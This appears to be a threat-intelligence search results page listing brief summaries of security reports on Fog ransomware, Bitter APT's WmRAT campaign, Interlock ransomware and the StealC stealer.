In May 2025, an unusual ransomware attack using the Fog ransomware targeted a financial institution in Asia, employing rare tools such as Syteca employee monitoring software and open-source pentesting utilities like GC2, Adaptix, and Stowaway. The attackers also established persistence on the network post-ransomware deployment, indicating possible espionage motives beyond typical ransomware objectives. #FogRansomware #Syteca #GC2 #Adaptix #Stowaway
Search Results for: fog
A recently discovered open directory linked to the Fog ransomware group contained various tools and scripts used for cyber intrusions. Initial access was gained through
A targeted social engineering campaign has emerged, with a GitHub repository posing as a coding challenge aimed specifically at Polish-speaking developers. The campaign utilizes a
Fog Ransomware, detected in May 2024, primarily targets educational institutions in the US, employing a double extortion tactic. It utilizes a TOR-based data leak site
Short Summary: Fog ransomware, first detected in May 2024, is a new strain targeting US educational organizations. Darktrace’s investigation revealed a rapid attack cycle, utilizing
Short Summary: The Fog Ransomware group has shifted its focus from targeting educational and recreational sectors to attacking financial services. Adlumin successfully thwarted a ransomware
Summary On May 2, 2024, Arctic Wolf Labs began monitoring deployment of a new ransomware variant referred to as Fog. The ransomware activity was observed
Pakistan Telecommunication Company (PTCL) Targeted by Bitter APT During Heightened Regional Conflict
Bitter APT conducted a spear phishing campaign targeting Pakistan Telecommunication Company Limited employees using stolen credentials from Pakistan’s Counter Terrorism Department, delivering a new variant of the WmRAT remote access trojan. This cyber espionage attack occurred amid India-Pakistan military tensions and aimed to gain persistent access to Pakistan’s critical telecom infrastructure. #BitterAPT #WmRAT #PTCL
Netskope Threat Labs uncovered a complex multi-stage attack chain executed by the DOGE Big Balls ransomware, a variant of Fog ransomware, leveraging custom PowerShell scripts, open-source tools, vulnerable drivers, and the Havoc red team framework. The infection involves sophisticated persistence mechanisms, lateral movement, and credential dumping, often hosted and updated through Netlify, posing significant risks to targeted networks. #DOGEBigBalls #FogRansomware #Havoc #Mimikatz #Rubeus
Introduction Interlock is a ransomware intrusion set first observed in September 2024 that conducts Big Game Hunting and double extortion campaigns. Interlock cannot be classified as a “Ransomware-as-a-Service” (RaaS) group, as no advertisements for recruiting affiliates or information about affiliates have been found as of March 2025. As many other ransomware groups, Interlock has a […]
La publication suivante Interlock ransomware evolving under the radar est un article de Sekoia.io Blog.
This article details a sophisticated ransomware operation that uses a deceptive ZIP file containing an LNK shortcut to deploy a multi-stage PowerShell-based infection. The attack
StealC is a prominent C++ stealer that has been operational since 2022, with the recent release of version 2 in March 2025. This update introduces
